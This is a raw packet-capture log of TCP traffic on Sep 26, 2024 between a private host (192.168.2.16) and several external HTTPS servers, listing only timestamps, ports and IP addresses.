Sep 26, 2024 17:55:40.112025976 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.112030029 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.112039089 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.112052917 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.112077951 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.114473104 CEST	49820	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.114515066 CEST	443	49820	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.114571095 CEST	49820	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.114816904 CEST	49820	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.114831924 CEST	443	49820	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.641545057 CEST	443	49820	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.642175913 CEST	49820	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.642556906 CEST	49820	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.642569065 CEST	443	49820	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.642821074 CEST	49820	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.642827034 CEST	443	49820	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.773123980 CEST	443	49820	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.773199081 CEST	443	49820	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.773372889 CEST	49820	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.773664951 CEST	49820	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.773680925 CEST	443	49820	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.778654099 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.778712988 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.778875113 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.779078007 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.779095888 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.899281979 CEST	443	49819	150.171.85.254	192.168.2.16
Sep 26, 2024 17:55:40.899454117 CEST	49819	443	192.168.2.16	150.171.85.254
Sep 26, 2024 17:55:40.902512074 CEST	49819	443	192.168.2.16	150.171.85.254
Sep 26, 2024 17:55:40.902512074 CEST	49819	443	192.168.2.16	150.171.85.254
Sep 26, 2024 17:55:40.902544022 CEST	443	49819	150.171.85.254	192.168.2.16
Sep 26, 2024 17:55:40.902575016 CEST	443	49819	150.171.85.254	192.168.2.16
Sep 26, 2024 17:55:40.902806997 CEST	443	49819	150.171.85.254	192.168.2.16
Sep 26, 2024 17:55:40.903179884 CEST	49819	443	192.168.2.16	150.171.85.254
Sep 26, 2024 17:55:40.991005898 CEST	49680	80	192.168.2.16	192.229.211.108
Sep 26, 2024 17:55:41.075037956 CEST	443	49819	150.171.85.254	192.168.2.16
Sep 26, 2024 17:55:41.075105906 CEST	443	49819	150.171.85.254	192.168.2.16
Sep 26, 2024 17:55:41.075216055 CEST	49819	443	192.168.2.16	150.171.85.254
Sep 26, 2024 17:55:41.078246117 CEST	49819	443	192.168.2.16	150.171.85.254
Sep 26, 2024 17:55:41.078247070 CEST	49822	443	192.168.2.16	150.171.85.254
Sep 26, 2024 17:55:41.078289032 CEST	443	49819	150.171.85.254	192.168.2.16
Sep 26, 2024 17:55:41.078294039 CEST	443	49822	150.171.85.254	192.168.2.16
Sep 26, 2024 17:55:41.078501940 CEST	49822	443	192.168.2.16	150.171.85.254
Sep 26, 2024 17:55:41.078841925 CEST	49822	443	192.168.2.16	150.171.85.254
Sep 26, 2024 17:55:41.078855991 CEST	443	49822	150.171.85.254	192.168.2.16
Sep 26, 2024 17:55:41.280385971 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.280632019 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.281228065 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.281228065 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.281246901 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.281269073 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.338243961 CEST	49678	443	192.168.2.16	20.189.173.10
Sep 26, 2024 17:55:41.473031998 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.473061085 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.473078012 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.473238945 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.473316908 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.473443031 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.556792021 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.557081938 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.557117939 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.557292938 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.558832884 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.558851957 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.559106112 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.559125900 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.560226917 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.625272036 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.625355959 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.625389099 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.625430107 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.625648975 CEST	49681	443	192.168.2.16	51.104.15.253
Sep 26, 2024 17:55:41.645608902 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.645625114 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.645711899 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.645740986 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.645781994 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.646416903 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.646430016 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.646507025 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.646513939 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.646549940 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.648238897 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.648252010 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.648351908 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.648365021 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.648408890 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.649022102 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.649087906 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.649096012 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.649137974 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.733778000 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.733794928 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.733885050 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.733916044 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.733962059 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.734065056 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.734138012 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.734890938 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.734905005 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.734973907 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.734992981 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.735037088 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.735845089 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.735860109 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.735933065 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.735948086 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.735980988 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.736057043 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.736131907 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.736140966 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.736190081 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.736931086 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.736943960 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.737014055 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.737025023 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.737066984 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.737178087 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.737231970 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.737238884 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.737274885 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.738142967 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.738158941 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.738229990 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.738243103 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.738291025 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.738780975 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.738871098 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.738884926 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.738922119 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.785227060 CEST	49683	443	192.168.2.16	204.79.197.222
Sep 26, 2024 17:55:41.822436094 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.822458982 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.822577000 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.822617054 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.822657108 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.822675943 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.822700024 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.823208094 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.823224068 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.823296070 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.823311090 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.823350906 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.823793888 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.823807955 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.823880911 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.823894024 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.823935032 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.824448109 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.824513912 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.824522018 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.824567080 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.827233076 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.827246904 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.827296972 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.827306032 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.827338934 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.827356100 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.827545881 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.827627897 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.827636003 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.827672005 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.827725887 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.827785015 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.828278065 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.828290939 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.828357935 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.828365088 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.828402042 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.828706026 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.828718901 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.828778028 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.828784943 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.828824043 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.849169970 CEST	443	49822	150.171.85.254	192.168.2.16
Sep 26, 2024 17:55:41.849239111 CEST	49822	443	192.168.2.16	150.171.85.254
Sep 26, 2024 17:55:41.849760056 CEST	49822	443	192.168.2.16	150.171.85.254
Sep 26, 2024 17:55:41.849788904 CEST	443	49822	150.171.85.254	192.168.2.16
Sep 26, 2024 17:55:41.849951982 CEST	49822	443	192.168.2.16	150.171.85.254
Sep 26, 2024 17:55:41.849963903 CEST	443	49822	150.171.85.254	192.168.2.16
Sep 26, 2024 17:55:41.862432957 CEST	49823	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:41.862489939 CEST	443	49823	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:41.862559080 CEST	49823	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:41.872668028 CEST	49823	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:41.872704983 CEST	443	49823	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:41.892175913 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.892281055 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.892304897 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.892355919 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.911871910 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.911892891 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.911976099 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.911999941 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.912039995 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.912170887 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.912234068 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.912244081 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.912292957 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.912662029 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.912674904 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.912739992 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.912751913 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.912801981 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.913340092 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.913352966 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.913384914 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.913415909 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.913429976 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.913470984 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.913491011 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.913914919 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.913928986 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.913961887 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.913996935 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.914006948 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.914031982 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.914050102 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.914057016 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.914098978 CEST	49821	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.914110899 CEST	443	49821	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.916269064 CEST	49824	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.916315079 CEST	443	49824	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:41.916399956 CEST	49824	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.916604996 CEST	49824	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:41.916620970 CEST	443	49824	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:42.029923916 CEST	443	49822	150.171.85.254	192.168.2.16
Sep 26, 2024 17:55:42.029984951 CEST	443	49822	150.171.85.254	192.168.2.16
Sep 26, 2024 17:55:42.030005932 CEST	49822	443	192.168.2.16	150.171.85.254
Sep 26, 2024 17:55:42.030062914 CEST	49822	443	192.168.2.16	150.171.85.254
Sep 26, 2024 17:55:42.030709028 CEST	49822	443	192.168.2.16	150.171.85.254
Sep 26, 2024 17:55:42.030747890 CEST	443	49822	150.171.85.254	192.168.2.16
Sep 26, 2024 17:55:42.043240070 CEST	49825	443	192.168.2.16	13.107.213.254
Sep 26, 2024 17:55:42.043268919 CEST	443	49825	13.107.213.254	192.168.2.16
Sep 26, 2024 17:55:42.043370962 CEST	49825	443	192.168.2.16	13.107.213.254
Sep 26, 2024 17:55:42.043617010 CEST	49825	443	192.168.2.16	13.107.213.254
Sep 26, 2024 17:55:42.043637037 CEST	443	49825	13.107.213.254	192.168.2.16
Sep 26, 2024 17:55:42.266608000 CEST	49826	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:42.266655922 CEST	443	49826	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:42.266741991 CEST	49826	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:42.266947985 CEST	49826	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:42.266963959 CEST	443	49826	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:42.401983023 CEST	443	49824	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:42.402045012 CEST	49824	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:42.587999105 CEST	443	49823	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:42.588113070 CEST	49823	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:42.590358019 CEST	49823	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:42.590368986 CEST	443	49823	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:42.590688944 CEST	443	49823	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:42.597755909 CEST	49823	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:42.639409065 CEST	443	49823	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:42.679142952 CEST	443	49825	13.107.213.254	192.168.2.16
Sep 26, 2024 17:55:42.679256916 CEST	49825	443	192.168.2.16	13.107.213.254
Sep 26, 2024 17:55:42.743222952 CEST	49673	443	192.168.2.16	204.79.197.203
Sep 26, 2024 17:55:42.831223011 CEST	443	49826	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:42.831289053 CEST	49826	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:42.938210011 CEST	443	49823	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:42.938280106 CEST	443	49823	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:42.938344955 CEST	49823	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:42.988044024 CEST	49823	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:43.864526033 CEST	49827	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:43.864574909 CEST	443	49827	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:43.864716053 CEST	49827	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:43.865170002 CEST	49827	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:43.865186930 CEST	443	49827	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:44.553870916 CEST	443	49827	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:44.553953886 CEST	49827	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:44.555793047 CEST	49827	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:44.555808067 CEST	443	49827	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:44.556060076 CEST	443	49827	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:44.563973904 CEST	49827	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:44.566183090 CEST	49674	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:44.566206932 CEST	49675	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:44.566214085 CEST	49677	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:44.607395887 CEST	443	49827	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:44.889632940 CEST	443	49827	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:44.889705896 CEST	443	49827	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:44.889784098 CEST	49827	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:44.889949083 CEST	49827	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:44.890002966 CEST	443	49827	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:44.890033007 CEST	49827	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:44.890049934 CEST	443	49827	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:44.920691967 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:44.920811892 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:44.921009064 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:44.921201944 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:44.921231985 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:45.604083061 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:45.605443001 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:45.605477095 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:45.606174946 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:45.606182098 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:45.794259071 CEST	49680	80	192.168.2.16	192.229.211.108
Sep 26, 2024 17:55:45.930732965 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:45.930762053 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:45.930866003 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:45.930898905 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:45.987569094 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:46.047038078 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:46.047049999 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:46.047193050 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:46.047566891 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:46.047574043 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:46.047645092 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:46.048508883 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:46.048516989 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:46.048583031 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:46.049336910 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:46.049407005 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:46.163722992 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:46.163826942 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:46.163928986 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:46.164021015 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:46.164836884 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:46.164904118 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:46.165623903 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:46.165694952 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:46.166306973 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:46.166382074 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:46.166555882 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:46.166630030 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:46.167268038 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:46.167342901 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:46.240339041 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:46.240469933 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:46.283721924 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:46.283833027 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:46.283844948 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:46.283925056 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:46.284372091 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:46.284409046 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:46.284466982 CEST	49828	443	192.168.2.16	185.255.122.133
Sep 26, 2024 17:55:46.284476042 CEST	443	49828	185.255.122.133	192.168.2.16
Sep 26, 2024 17:55:46.284511089 CEST	49828	443	192.168.2.16	185.255.122.133
